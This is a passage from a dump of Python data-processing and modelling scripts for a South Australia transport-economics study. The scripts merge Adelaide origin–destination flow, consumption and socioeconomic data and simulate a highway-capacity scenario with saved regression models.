area\nadelaide_sa4_set = ['401','402','403','404']\nflow_adelaide_df = flow_df.loc[np.array([x[:3] in adelaide_sa4_set for x in flow_df.agent_home_sa2])]\nflow_adelaide_df = flow_adelaide_df.loc[np.array([x[:3] in adelaide_sa4_set for x in flow_adelaide_df.sa2])]\ntrans_age_adelaide_df = trans_age_df.loc[np.array([x[:3] in adelaide_sa4_set for x in trans_age_df.source_sa2])]\ntrans_age_adelaide_df = trans_age_adelaide_df.loc[np.array([x[:3] in adelaide_sa4_set for x in trans_age_adelaide_df.target_sa2])]\ntrans_mcc_adelaide_df = trans_mcc_df.loc[np.array([x[:3] in adelaide_sa4_set for x in trans_mcc_df.source_sa2])]\ntrans_mcc_adelaide_df = trans_mcc_adelaide_df.loc[np.array([x[:3] in adelaide_sa4_set for x in trans_mcc_adelaide_df.target_sa2])]\n\nprint(flow_adelaide_df.shape)\nprint(trans_age_adelaide_df.shape)\nprint(trans_mcc_adelaide_df.shape)\n\n# replace names and reindex\nflow_adelaide_df.rename(columns={'agent_home_sa2':'O',\n 'sa2':'D',\n 'unique_agents':'flow_agents',\n 'sum_stay_duration':'flow_duration',\n 'total_stays':'flow_stays'},inplace=True)\nflow_adelaide_df.reset_index(drop=True, inplace=True)\ntrans_age_adelaide_df.rename(columns={'source_sa2':'O','target_sa2':'D'},inplace=True)\ntrans_age_adelaide_df.reset_index(drop=True, inplace=True)\ntrans_mcc_adelaide_df.rename(columns={'source_sa2':'O','target_sa2':'D'},inplace=True)\ntrans_mcc_adelaide_df.reset_index(drop=True, inplace=True)\n\n# aggregate transaction data into OD pairs\ntrans_age_adelaide_agg_df=trans_age_adelaide_df.groupby(['O', 
'D'],as_index=False).aggregate([\"sum\"]).reset_index()[['O','D','count','amount']]\ntrans_mcc_adelaide_agg_df=trans_mcc_adelaide_df.groupby(['O', 'D'],as_index=False).aggregate([\"sum\"]).reset_index()[['O','D','count','amount']]\ntrans_age_adelaide_agg_df.columns=['O','D','consumption_count_age_source','consumption_amount_age_source']\ntrans_mcc_adelaide_agg_df.columns=['O','D','consumption_count_mcc_source','consumption_amount_mcc_source']\n\n# merge files\nsa2_adelaide_edge_flow = sa2_adelaide_edge.merge(flow_adelaide_df[['O','D','flow_agents','flow_duration','flow_stays']], on=['O','D'], how='outer')\nsa2_adelaide_edge_flow = sa2_adelaide_edge_flow.merge(trans_age_adelaide_agg_df, on=['O','D'], how='outer')\nsa2_adelaide_edge_flow = sa2_adelaide_edge_flow.merge(trans_mcc_adelaide_agg_df, on=['O','D'], how='outer')\n\n# save\nsa2_adelaide_edge_flow.to_pickle(intermediate_data_path+'sa2_edge_flow.pickle')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.6758086085319519,
"alphanum_fraction": 0.686562180519104,
"avg_line_length": 54.375,
"blob_id": "4e1cbb5a201a9eaa3bc31a046cf166b7245b9a4f",
"content_id": "3db26017012d49ef04ed02725031877aaed46d86",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11996,
"license_type": "permissive",
"max_line_length": 177,
"num_lines": 216,
"path": "/src/d05_model_evaluation/eval_hypo_scenario.py",
"repo_name": "cjsyzwsh/South_Australia_Transport_Econ",
"src_encoding": "UTF-8",
"text": "# evaluate the hypothetical scenario that highways have a better capacity.\n#\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport geopandas as gpd\nimport pickle\nimport statsmodels.api as sm\nfrom sklearn.linear_model import LassoCV\nfrom sklearn.preprocessing import normalize\nfrom sklearn import linear_model\nimport copy\n\n# system path\nimport sys\nimport os\n\n# util path\nutility_path = os.path.join(os.getcwd(),'src/d00_utils/')\nsys.path.append(utility_path)\nimport utilities as util\n\n# path\nprocessing_data_path = os.path.join(os.getcwd(),'data/03_processed/')\nmodel_path = os.path.join(os.getcwd(),'data/04_models/')\nmodel_output_path = os.path.join(os.getcwd(),'data/05_model_outputs/')\nreport_path = os.path.join(os.getcwd(),'data/06_reporting/')\n\n# read data\nwith open(processing_data_path+'node_df.pickle', 'rb') as f:\n node_df = pickle.load(f)\n node_df.reset_index()\n\nwith open(processing_data_path+'edge_consumption_df.pickle', 'rb') as f:\n edge_df = pickle.load(f) # use only edge_consumption_df for policy simulation\n edge_df = edge_df.reset_index() # reset\n\n# read models\nwith open(model_path + 'model1_list_od_duration' + '.pickle', 'rb') as f:\n model1_list_od_duration = pickle.load(f)\n\nwith open(model_path + 'model2_list_consumption_amount_mcc_source' + '.pickle', 'rb') as f:\n model2_list_consumption_amount_mcc_source = pickle.load(f)\n\nwith open(model_path + 'model2_list_consumption_count_mcc_source' + '.pickle', 'rb') as f:\n model2_list_consumption_count_mcc_source = pickle.load(f)\n\nwith open(model_path + 'model2_list_flow_agents' + '.pickle', 'rb') as f:\n model2_list_flow_agents = pickle.load(f)\n\nwith open(model_path + 'model3_list_median_income_per_job_aud_persons' + '.pickle', 'rb') as f:\n model3_list_median_income_per_job_aud_persons = pickle.load(f)\n\n\n###########################################################################################\n# Forward pass for status quo and hypothetical case\n###########################################################################################\n\ndef forward_simulation(edge_df, node_df, status_quo = True):\n # predict and change four variables in edge_df:\n # od_duration, consumption_amount_mcc_source, consumption_count_mcc_source, flow_agents\n # predict five variables.\n #\n\n # model 1.\n # od_duration_pred is the output from the model 1.\n _, (y_name, x_name), model1 = model1_list_od_duration[-1]\n\n if status_quo == True:\n od_duration_pred = np.exp(model1.predict(sm.add_constant(np.log(edge_df[x_name])))) # remember the log and exponential transformation!\n else:\n model1.params['class_HWY'] = -0.48 # highway capacity increases by 20% compared to average\n od_duration_pred = np.exp(model1.predict(sm.add_constant(np.log(edge_df[x_name])))) # remember the log and exponential transformation!\n edge_df[y_name] = od_duration_pred # replace od_duration by predicted value\n\n # model 2.\n # three outputs:\n # model 2.1\n _, (y_name, x_name), model2_consumption_amount_mcc_source = model2_list_consumption_amount_mcc_source[-1]\n consumption_amount_mcc_source_pred = np.exp(model2_consumption_amount_mcc_source.predict(sm.add_constant(np.log(edge_df[x_name]))))\n edge_df[y_name] = consumption_amount_mcc_source_pred\n\n # model 2.2\n _, (y_name, x_name), model2_consumption_count_mcc_source = model2_list_consumption_count_mcc_source[-1]\n consumption_count_mcc_source_pred = np.exp(model2_consumption_count_mcc_source.predict(sm.add_constant(np.log(edge_df[x_name]))))\n 
edge_df[y_name] = consumption_count_mcc_source_pred\n\n    # model 2.3\n    _, (y_name, x_name), model2_flow_agents = model2_list_flow_agents[-1]\n    flow_agents_pred = np.exp(model2_flow_agents.predict(sm.add_constant(np.log(edge_df[x_name]))))\n    edge_df[y_name] = flow_agents_pred\n\n    # model 3.\n    _, (y_name, x_name), model3 = model3_list_median_income_per_job_aud_persons[-1]\n    # update six columns in node_df: the _o and _d aggregates of consumption_amount_mcc_source,\n    # consumption_count_mcc_source, and flow_agents\n    edge_df_relevant = edge_df[['O', 'D',\n                                'consumption_amount_mcc_source',\n                                'consumption_count_mcc_source',\n                                'flow_agents']]\n\n    sa2_flow_o = edge_df_relevant.groupby('O').aggregate(['sum']).reset_index()\n    col_list = sa2_flow_o.columns\n    col_new = [col[0]+'_o' for col in col_list]\n    sa2_flow_o.columns = col_new\n\n    sa2_flow_d = edge_df_relevant.groupby('D').aggregate(['sum']).reset_index()\n    col_list = sa2_flow_d.columns\n    col_new = [col[0]+'_d' for col in col_list]\n    sa2_flow_d.columns = col_new\n\n    node_df = node_df.merge(sa2_flow_o, left_on=['SA2_MAIN16'], right_on=['O_o'], how='left', suffixes=['_drop', ''])\n    node_df = node_df.merge(sa2_flow_d, left_on=['SA2_MAIN16'], right_on=['D_d'], how='left', suffixes=['_drop', ''])\n\n    # drop columns\n    node_df = node_df.drop(columns=['D_o', 'O_d'])\n\n    if status_quo == True:\n        inc_pred = np.exp(model3.predict(sm.add_constant(np.log(node_df[x_name]))))\n    else:\n        model3.params['consumption_count_mcc_source_d'] = 0.0 # zero out the insignificant parameter\n        inc_pred = np.exp(model3.predict(sm.add_constant(np.log(node_df[x_name]))))\n\n    return od_duration_pred, consumption_amount_mcc_source_pred, consumption_count_mcc_source_pred, flow_agents_pred, inc_pred\n\n\n# 1. Use the status quo\nstatus_quo = True\nod_duration_pred, consumption_amount_mcc_source_pred, consumption_count_mcc_source_pred, flow_agents_pred, inc_pred = \\\n    forward_simulation(edge_df, node_df, status_quo)\n\n# create an econ_opportunity_status_quo_dic\n# format - metric_name: (target_var_name, time_var_name, attraction_param, friction_param, o_or_d)\necon_opportunity_input_dic = {'job_based_consumption_opportunity': ('job_density_1_o', 'od_duration', 0.047+0.064, 0.982, 'D'),\n                              'pop_based_consumption_opportunity': ('pop_density_o', 'od_duration', 0.055+0.078, 0.982, 'D'),\n                              'amenity_based_consumption_opportunity': ('poi_count_agg_density_o', 'od_duration', 0.037+0.141, 1.006, 'D'),\n                              'diversity_based_consumption_opportunity': ('poi_entropy_agg_density_o', 'od_duration', 0.084+0.066, 1.002, 'D')\n                              }\n\n# status_quo_dic\necon_opportunity_status_quo_dic = {}\nfor metric_name in econ_opportunity_input_dic.keys():\n    target_var_name, time_var_name, attraction_param, friction_param, o_or_d = econ_opportunity_input_dic[metric_name]\n    metric_output = util.compute_econ_opportunity(metric_name, target_var_name, time_var_name, edge_df,\n                                                  attraction_param, friction_param, o_or_d)\n    econ_opportunity_status_quo_dic[metric_name] = metric_output\n\n
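# hedged reference sketch (an addition; the authoritative formula lives in\n# util.compute_econ_opportunity under src/d00_utils): each metric above appears\n# to be a gravity-style accessibility sum of the form\n#   opportunity_D = sum over edges( attraction_O**attraction_param / time_OD**friction_param )\n# e.g., for the job-based metric with the parameters from the dict above:\n# toy = edge_df.groupby('D').apply(\n#     lambda g: np.sum(g['job_density_1_o']**(0.047+0.064) / g['od_duration']**0.982))\n\n\n# 2. 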
Use the hypothetical case\nstatus_quo = False\nod_duration_pred_new, consumption_amount_mcc_source_pred_new, consumption_count_mcc_source_pred_new, flow_agents_pred_new, inc_pred_new = \\\n forward_simulation(edge_df, node_df, status_quo)\n\n# compute economic opportunity metric (hypothetical case)\necon_opportunity_hypo_dic = {}\nfor metric_name in econ_opportunity_input_dic.keys():\n target_var_name, time_var_name, attraction_param, friction_param, o_or_d = econ_opportunity_input_dic[metric_name]\n metric_output = util.compute_econ_opportunity(metric_name, target_var_name, time_var_name, edge_df,\n attraction_param, friction_param, o_or_d)\n econ_opportunity_hypo_dic[metric_name] = metric_output\n\n\n# 3. Compare\nprint(np.sum(od_duration_pred_new - od_duration_pred))\nprint(np.sum(consumption_amount_mcc_source_pred_new - consumption_amount_mcc_source_pred))\nprint(np.sum(consumption_count_mcc_source_pred_new - consumption_count_mcc_source_pred))\nprint(np.sum(flow_agents_pred_new - flow_agents_pred))\nprint(np.sum(inc_pred_new - inc_pred)/np.sum(inc_pred))\nprint(np.sum(econ_opportunity_hypo_dic['job_based_consumption_opportunity']['job_based_consumption_opportunity'] - \\\n econ_opportunity_status_quo_dic['job_based_consumption_opportunity']['job_based_consumption_opportunity']))\nprint(np.sum(econ_opportunity_hypo_dic['pop_based_consumption_opportunity']['pop_based_consumption_opportunity'] - \\\n econ_opportunity_status_quo_dic['pop_based_consumption_opportunity']['pop_based_consumption_opportunity']))\nprint(np.sum(econ_opportunity_hypo_dic['amenity_based_consumption_opportunity']['amenity_based_consumption_opportunity'] - \\\n econ_opportunity_status_quo_dic['amenity_based_consumption_opportunity']['amenity_based_consumption_opportunity']))\nprint(np.sum(econ_opportunity_hypo_dic['diversity_based_consumption_opportunity']['diversity_based_consumption_opportunity'] - \\\n econ_opportunity_status_quo_dic['diversity_based_consumption_opportunity']['diversity_based_consumption_opportunity']))\n\n# save simulation results.\n# read node and edge.\nwith open(processing_data_path+'node_df.pickle', 'rb') as f:\n node_df = pickle.load(f)\n node_df.reset_index()\n\nwith open(processing_data_path+'edge_consumption_df.pickle', 'rb') as f:\n edge_df = pickle.load(f) # use only edge_consumption_df for policy simulation\n edge_df = edge_df.reset_index() # reset\n\nedge_df['od_duration_save'] = od_duration_pred - od_duration_pred_new # reverse the order because new od_duration is smaller.\nedge_df['consumption_amount_increase'] = consumption_amount_mcc_source_pred_new - consumption_amount_mcc_source_pred\nedge_df['consumption_count_increase'] = consumption_count_mcc_source_pred_new - consumption_count_mcc_source_pred\nedge_df['flow_agents_increase'] = flow_agents_pred_new - flow_agents_pred\nnode_df['income_increase'] = inc_pred_new - inc_pred\n\nnode_df['job_based_consumption_opportunity_increase'] = econ_opportunity_hypo_dic['job_based_consumption_opportunity']['job_based_consumption_opportunity'] - \\\n econ_opportunity_status_quo_dic['job_based_consumption_opportunity']['job_based_consumption_opportunity']\nnode_df['pop_based_consumption_opportunity_increase'] = econ_opportunity_hypo_dic['pop_based_consumption_opportunity']['pop_based_consumption_opportunity'] - \\\n econ_opportunity_status_quo_dic['pop_based_consumption_opportunity']['pop_based_consumption_opportunity']\nnode_df['amenity_based_consumption_opportunity_increase'] = 
econ_opportunity_hypo_dic['amenity_based_consumption_opportunity']['amenity_based_consumption_opportunity'] - \\\n econ_opportunity_status_quo_dic['amenity_based_consumption_opportunity']['amenity_based_consumption_opportunity']\nnode_df['diversity_based_consumption_opportunity_increase'] = econ_opportunity_hypo_dic['diversity_based_consumption_opportunity']['diversity_based_consumption_opportunity'] - \\\n econ_opportunity_status_quo_dic['diversity_based_consumption_opportunity']['diversity_based_consumption_opportunity']\n\n# save the status quo accessibility metrics\nnode_df['amenity_based_consumption_opportunity']=econ_opportunity_status_quo_dic['amenity_based_consumption_opportunity']['amenity_based_consumption_opportunity']\nnode_df['diversity_based_consumption_opportunity']=econ_opportunity_status_quo_dic['diversity_based_consumption_opportunity']['diversity_based_consumption_opportunity']\nnode_df['pop_based_consumption_opportunity']=econ_opportunity_status_quo_dic['pop_based_consumption_opportunity']['pop_based_consumption_opportunity']\nnode_df['job_based_consumption_opportunity']=econ_opportunity_status_quo_dic['job_based_consumption_opportunity']['job_based_consumption_opportunity']\n\n\n\n# save\nwith open(model_output_path+'edge_df_policy_simulation.pickle', 'wb') as f:\n pickle.dump(edge_df, f)\n\nwith open(model_output_path+'node_df_policy_simulation.pickle', 'wb') as f:\n pickle.dump(node_df, f)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.6154303550720215,
"alphanum_fraction": 0.6416857838630676,
"avg_line_length": 47.60330581665039,
"blob_id": "a39eeade3cfc6d26a6586540299f298cc2cc75a3",
"content_id": "29f3d528121c3d3a81183aa662ffa3f6ab3202d3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11769,
"license_type": "permissive",
"max_line_length": 193,
"num_lines": 242,
"path": "/src/d03_processing/process_merge.py",
"repo_name": "cjsyzwsh/South_Australia_Transport_Econ",
"src_encoding": "UTF-8",
"text": "# This script combines the intermediate data into processed data\n# outputs:\n# node.pickle - shape: (110 * _) - all the nodal information\n# edge:pickle - shape: (12100 * _) - all the edge information\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport geopandas as gpd\nimport pickle\nimport copy\n\n# system path\nimport sys\nimport os\n\n# util path\nutility_path = os.path.join(os.getcwd(),'src/d00_utils/')\nsys.path.append(utility_path)\nimport utilities as util\n\n# data path\n# sw: define the path based on the root project directory.\nintermediate_data_path = os.path.join(os.getcwd(),'data/02_intermediate/')\nprocessing_data_path = os.path.join(os.getcwd(),'data/03_processed/')\n\n# read files\nsa2_adelaide_node = gpd.read_file(intermediate_data_path+'shapefiles/sa2_adelaide.shp')\nsa2_adelaide_edge = gpd.read_file(intermediate_data_path+'shapefiles/sa2_adelaide_edge.shp')\n# read six files\nwith open(intermediate_data_path+'sa2_node_with_socio_econ_df.pickle', 'rb') as f:\n sa2_node_with_socio_econ_df = pickle.load(f)\n\nwith open(intermediate_data_path+'sa2_node_with_POI_counts_entropy.pickle', 'rb') as f:\n sa2_node_with_POI_counts_entropy = pickle.load(f)\n\nwith open(intermediate_data_path+'sa2_node_with_only_transport_attributes.pickle', 'rb') as f:\n sa2_node_with_only_transport_attributes = pickle.load(f)\n\nwith open(intermediate_data_path+'sa2_edge_flow.pickle', 'rb') as f:\n sa2_edge_flow = pickle.load(f)\n\nwith open(intermediate_data_path+'sa2_edge_travel_time.pickle', 'rb') as f:\n sa2_edge_travel_time = pickle.load(f)\n\nwith open(intermediate_data_path+'sa2_edge_with_only_transport_attributes.pickle', 'rb') as f:\n sa2_edge_with_only_transport_attributes = pickle.load(f)\n\n# drop geometry columns\nsa2_edge_flow.drop(columns=['geometry'],inplace=True)\nsa2_edge_with_only_transport_attributes.drop(columns=['geometry'],inplace=True)\nsa2_node_with_POI_counts_entropy.drop(columns=['geometry'],inplace=True)\nsa2_node_with_only_transport_attributes.drop(columns=['geometry'],inplace=True)\n\n# only subset of socio-econ variables are needed for now.\nsa2_node_with_socio_econ_df = sa2_node_with_socio_econ_df[['sa2_code16',\n 'num_jobs_000_persons',\n 'median_income_per_job_aud_persons',\n 'tot_num_jobs_000',\n 'total_pop',\n 'avg_age',\n 'male_percent',\n 'female_percent',\n 'bachelor_degree_percent',\n 'master_degree_percent',\n 'perc_indig_age_0_14',\n 'perc_indig_age_15_34',\n 'perc_indig_age_35_64',\n 'poverty_rate_1',\n 'poverty_rate_2',\n 'unemployment_rate',\n 'median_inc',\n 'gini']]\n\n#region 1. 
merge edge files\n# sa2_adelaide_edge, sa2_edge_flow, sa2_edge_travel_time, sa2_edge_with_only_transport_attributes\n# disaggregate nodal files: sa2_node_with_POI_counts_entropy, sa2_node_with_socio_econ_df.\nedge = copy.copy(sa2_adelaide_edge)\n\n# merge with edge files\nedge = edge.merge(sa2_edge_flow, left_on=['O','D'], right_on=['O','D'], how='left')\nedge = edge.merge(sa2_edge_travel_time, left_on=['O','D'], right_on=['O','D'], how='left')\nedge = edge.merge(sa2_edge_with_only_transport_attributes, left_on=['O','D'], right_on=['O','D'], how='left')\n\n# add nodal files to the edge files\nedge = edge.merge(sa2_node_with_POI_counts_entropy, left_on=['O'], right_on=['SA2_MAIN16'], how='left')\nedge = edge.merge(sa2_node_with_POI_counts_entropy, left_on=['D'], right_on=['SA2_MAIN16'], suffixes=['_o', '_d'], how='left')\nedge = edge.merge(sa2_node_with_socio_econ_df, left_on=['O'], right_on=['sa2_code16'], how='left')\nedge = edge.merge(sa2_node_with_socio_econ_df, left_on=['D'], right_on=['sa2_code16'], suffixes=['_o', '_d'], how='left')\n\n# save edge\nedge.to_pickle(processing_data_path+'edge_shp.pickle')\n\n#endregion\n\n\n#region 2. merge nodal files\n# sa2_adelaide_node, sa2_node_with_socio_econ_df, sa2_node_with_POI_counts_entropy, sa2_node_with_only_transport_attributes;\nnode = copy.copy(sa2_adelaide_node)\nnode = node.merge(sa2_node_with_socio_econ_df, left_on=['SA2_MAIN16'], right_on=['sa2_code16'], how='left')\nnode = node.merge(sa2_node_with_POI_counts_entropy, left_on=['SA2_MAIN16'], right_on=['SA2_MAIN16'], how='left')\nnode = node.merge(sa2_node_with_only_transport_attributes, left_on=['SA2_MAIN16'], right_on=['SA2_MAIN16'], how='left')\n\n# aggregate edge info to O and D. sa2_edge_flow\n# Then add O and D info to the nodal file\nsa2_flow_o = sa2_edge_flow.groupby('O').aggregate(['sum']).reset_index()\ncol_list = sa2_flow_o.columns\ncol_new = [col[0]+'_o' for col in col_list]\nsa2_flow_o.columns = col_new\n\nsa2_flow_d = sa2_edge_flow.groupby('D').aggregate(['sum']).reset_index()\ncol_list = sa2_flow_d.columns\ncol_new = [col[0]+'_d' for col in col_list]\nsa2_flow_d.columns = col_new\n\nnode = node.merge(sa2_flow_o, left_on=['SA2_MAIN16'], right_on=['O_o'], how='left')\nnode = node.merge(sa2_flow_d, left_on=['SA2_MAIN16'], right_on=['D_d'], how='left')\n\n# drop two columns\nnode = node.drop(columns=['D_o', 'O_d'])\n\n# change data types\nnode[['num_nodes', 'num_1degree', 'num_2degree', 'num_3degree', 'num_4degree', 'num_greater5degree']] = \\\n node[['num_nodes', 'num_1degree', 'num_2degree', 'num_3degree', 'num_4degree', 'num_greater5degree']].astype('int64')\n\n# add pop density variable\nnode['pop_density'] = node['total_pop']/(node.area * 1000)\n\n# add POI densities\nnode['poi_count_density']=node['poi_count']/(1000*node.area)\nnode['poi_count_agg_density']=node['poi_count_agg']/(1000*node.area)\nnode['poi_entropy_density']=node['poi_entropy']/(1000*node.area)\nnode['poi_entropy_agg_density']=node['poi_entropy_agg']/(1000*node.area)\n\n# add job densities\nnode['job_density_1']=node['num_jobs_000_persons']/(1000*node.area)\nnode['job_density_2']=node['tot_num_jobs_000']/(1000*node.area)\n\n# add o and d info together\nnode['flow_agents'] = node['flow_agents_o'] + node['flow_agents_d']\nnode['flow_duration'] = node['flow_duration_o'] + node['flow_duration_d']\nnode['flow_stays'] = node['flow_stays_o'] + node['flow_stays_d']\nnode['consumption_count_age_source'] = node['consumption_count_age_source_o'] + 
node['consumption_count_age_source_d']\nnode['consumption_amount_age_source'] = node['consumption_amount_age_source_o'] + node['consumption_amount_age_source_d']\nnode['consumption_count_mcc_source'] = node['consumption_count_mcc_source_o'] + node['consumption_count_mcc_source_d']\nnode['consumption_amount_mcc_source'] = node['consumption_amount_mcc_source_o'] + node['consumption_amount_mcc_source_d']\n\n# save node\nnode.to_pickle(processing_data_path+'node_shp.pickle')\n#endregion\n\n\n\n#region 3. processing node and edge shapefiles into three data frames\n# read node and edge pickles\nwith open(processing_data_path+'node_shp.pickle', 'rb') as f:\n    node = pickle.load(f)\n\nwith open(processing_data_path+'edge_shp.pickle', 'rb') as f:\n    edge = pickle.load(f)\n\n# create plain dataframes (geometry dropped) to facilitate viewing in pycharm\nnode_df = pd.DataFrame(node.drop(columns=['geometry']))\nedge_df = pd.DataFrame(edge.drop(columns=['geometry']))\n\n# edit node_df\nprint(np.sum(node_df.isna()))\nprint(np.sum(node_df==0))\nprint(node_df.describe())\n# handle NaNs and zeros so the regressions can run in log space\nnode_df.dropna(how='any',inplace=True)\nprint(node_df.shape) # dropped 6 observations. Left with 104 obs.\nnon_zero_masks = np.logical_and(node_df.bachelor_degree_percent>0.00001, node_df.flow_agents_o>0.00001)\nnon_zero_masks = np.logical_and(node_df.poi_entropy_agg>0.00001, non_zero_masks)\nnode_df = node_df.loc[non_zero_masks, :]\nprint(node_df.shape) # dropped 2 observations. Left with 102 obs.\n\n# lift all road attributes by one for the log transformation.\nroad_attributes = ['class_ART',\n                   'class_BUS', 'class_COLL', 'class_HWY', 'class_LOCL',\n                   'class_SUBA', 'class_TRK2', 'class_TRK4', 'class_UND', 'num_roads', 'num_nodes',\n                   'num_1degree', 'num_2degree', 'num_3degree', 'num_4degree',\n                   'num_greater5degree']\nnode_df[road_attributes] += 1.0\n\n\n# edit edge_df\nprint(np.sum(edge_df.isna()))\nprint(np.sum(edge_df==0))\nprint(edge_df.describe())\n# drop self loops (110) and zero population areas (440)\nnon_zero_masks = np.logical_and(edge_df.od_duration > 0.000001, edge_df.total_pop_o > 0.000001) # od_duration and total_pop_o\nnon_zero_masks = np.logical_and(non_zero_masks, edge_df.total_pop_d > 0.000001)\nnon_zero_masks = np.logical_and(non_zero_masks, edge_df.avg_age_o > 0.000001)\nnon_zero_masks = np.logical_and(non_zero_masks, edge_df.avg_age_d > 0.000001)\nnon_zero_masks = np.logical_and(non_zero_masks, edge_df.bachelor_degree_percent_o > 0.000001)\nnon_zero_masks = np.logical_and(non_zero_masks, edge_df.bachelor_degree_percent_d > 0.000001)\nnon_zero_masks = np.logical_and(non_zero_masks, edge_df.poi_entropy_agg_o > 0.000001)\nnon_zero_masks = np.logical_and(non_zero_masks, edge_df.poi_entropy_agg_d > 0.000001)\nedge_df = edge_df.loc[non_zero_masks, :]\n\n\n# attach POI density (O and D) to edge_df\nedge_df = edge_df.merge(node_df[['SA2_MAIN16', 'pop_density', 'poi_count_density', 'poi_count_agg_density', 'poi_entropy_density', 'poi_entropy_agg_density', 'job_density_1', 'job_density_2']],\n                        left_on = 'O', right_on = 'SA2_MAIN16')\nedge_df = edge_df.merge(node_df[['SA2_MAIN16', 'pop_density', 'poi_count_density', 'poi_count_agg_density', 'poi_entropy_density', 'poi_entropy_agg_density', 'job_density_1', 'job_density_2']],\n                        left_on = 'D', right_on = 'SA2_MAIN16', suffixes = ['_o', '_d'])\n\n\n# split edge_df into edge_consumption_df and edge_flow_df,\n# because the consumption data have many missing values.\n
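# hedged sanity sketch (an addition): report how many OD rows carry each signal\n# before the split, since the two frames differ in coverage:\nprint(edge_df['flow_agents'].notna().sum(), 'rows with mobility flow')\nprint(edge_df['consumption_count_age_source'].notna().sum(), 'rows with consumption data')\nedge_flow_df = edge_df.loc[~edge_df.flow_agents.isna(), 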
]\nedge_consumption_df = edge_df.loc[~edge_df.consumption_count_age_source.isna(), ]\n\n#\nedge_flow_df = edge_flow_df.drop(columns = ['consumption_count_age_source', 'consumption_amount_age_source',\n 'consumption_count_mcc_source', 'consumption_amount_mcc_source'])\nedge_flow_df.dropna(how='any', inplace=True)\nedge_consumption_df.dropna(how='any', inplace=True)\n\n# lift road attributes by one unit.\nedge_flow_df[road_attributes] += 1.0\nedge_consumption_df[road_attributes] += 1.0\n\n# print dimensions\nprint(\"Final edge mobility flow dataframe dim is: \", edge_flow_df.shape)\nprint(\"Final edge consumption flow dataframe dim is: \", edge_consumption_df.shape)\nprint(\"Final node dataframe dim is: \", node_df.shape)\n\n# check the final\nprint(np.sum(node_df.isna()))\nprint(np.sum(node_df == 0))\nprint(np.sum(edge_flow_df.isna()))\nprint(np.sum(edge_flow_df == 0))\nprint(np.sum(edge_consumption_df.isna()))\nprint(np.sum(edge_consumption_df == 0))\n\n# save dataframes\nnode_df.to_pickle(processing_data_path+'node_df.pickle')\nedge_flow_df.to_pickle(processing_data_path+'edge_flow_df.pickle')\nedge_consumption_df.to_pickle(processing_data_path+'edge_consumption_df.pickle')\n#endregion\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.5783922076225281,
"alphanum_fraction": 0.6274449825286865,
"avg_line_length": 38.350807189941406,
"blob_id": "95e25d517063567df551342acac30dbcdf7342ed",
"content_id": "1c0a0e82072156db1b661344d03c44e4cdc04060",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9765,
"license_type": "permissive",
"max_line_length": 125,
"num_lines": 248,
"path": "/src/d02_intermediate/preprocess_1_socioecon.py",
"repo_name": "cjsyzwsh/South_Australia_Transport_Econ",
"src_encoding": "UTF-8",
"text": "# preprocessing the socioeconomic variables\n# inputs: five raw socio-demographcics data.\n# outputs: one combined socio-econ geopandas data frame.\n\n# import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport geopandas as gpd\n\n# system path\nimport sys\nimport os\n\n# util path\nutility_path = os.path.join(os.getcwd(),'src/d00_utils/')\nsys.path.append(utility_path)\nimport utilities as util\n\n# data path\n# sw: define the path based on the root project directory.\nraw_data_path = os.path.join(os.getcwd(),'data/01_raw/')\nintermediate_data_path = os.path.join(os.getcwd(),'data/02_intermediate/')\n\n\n# # raw data\n# mount_path = \"/Users/shenhaowang/Dropbox (MIT)/project_econ_opportunity_south_Australia\"\n\n\n#region 1. read and edit job and income data frames\njobs_all = pd.read_csv(raw_data_path + \"SA2_Jobs_All_Jobs_and_Income.csv\")\njobs_industries = pd.read_csv(raw_data_path + \"SA2_Jobs_In_Australia_Employee_Jobs_and_Income.csv\")\n\n# change column names for the two jobs data frame.\nnew_idx = []\nfor col in jobs_industries.columns:\n if col[0] == ' ':\n new_idx.append(col[1:])\n else:\n new_idx.append(col)\n\njobs_industries.columns = new_idx\n\nnew_idx = []\nfor col in jobs_all.columns:\n if col[0] == ' ':\n new_idx.append(col[1:])\n else:\n new_idx.append(col)\n\njobs_all.columns = new_idx\n\n# change types of job data frames\njobs_all['sa2_code16'] = jobs_all['sa2_code16'].astype('str')\njobs_industries['sa2_code16'] = jobs_industries['sa2_code16'].astype('str')\n# useful variables: all\n#endregion\n\n\n#region 2. read and edit age dataframe\nage_df = pd.read_csv(raw_data_path + \"data_age.csv\")\n# choose one section of age df\nage_df = age_df[[' sa2_main16', 'p_tot_75_84_yrs', ' p_tot_35_44_yrs', ' p_tot_45_54_yrs', ' p_tot_25_34_yrs', ' p_tot_85ov',\n ' p_tot_65_74_yrs', ' p_tot_20_24_yrs', ' p_tot_15_19_yrs', ' p_tot_55_64_yrs', ' p_tot_tot']]\n\nfor col in ['p_tot_75_84_yrs', ' p_tot_35_44_yrs', ' p_tot_45_54_yrs', ' p_tot_25_34_yrs', ' p_tot_85ov',\n ' p_tot_65_74_yrs', ' p_tot_20_24_yrs', ' p_tot_15_19_yrs', ' p_tot_55_64_yrs']:\n age_df[col] = age_df[col] / age_df[\" p_tot_tot\"] # compute percentage\n\navg_med_age = []\nfor idx, row in age_df.iterrows():\n avg = 0\n for col in ['p_tot_75_84_yrs', ' p_tot_35_44_yrs',\n ' p_tot_45_54_yrs', ' p_tot_25_34_yrs', ' p_tot_85ov',\n ' p_tot_65_74_yrs', ' p_tot_20_24_yrs', ' p_tot_15_19_yrs',\n ' p_tot_55_64_yrs']:\n if col != \" p_tot_85ov\":\n temp = col.split(\"_\")\n x = int(temp[2])\n y = int(temp[3])\n med = (x + y) / 2\n avg += (row[col] * med)\n else:\n avg += (row[col] * 85)\n # avg = avg/row[' p_tot_tot']\n avg_med_age.append(avg)\n\n# create average age column\nage_df[\"avg_age\"] = avg_med_age\n\n# edit sa2_main16 type\nage_df[' sa2_main16'] = 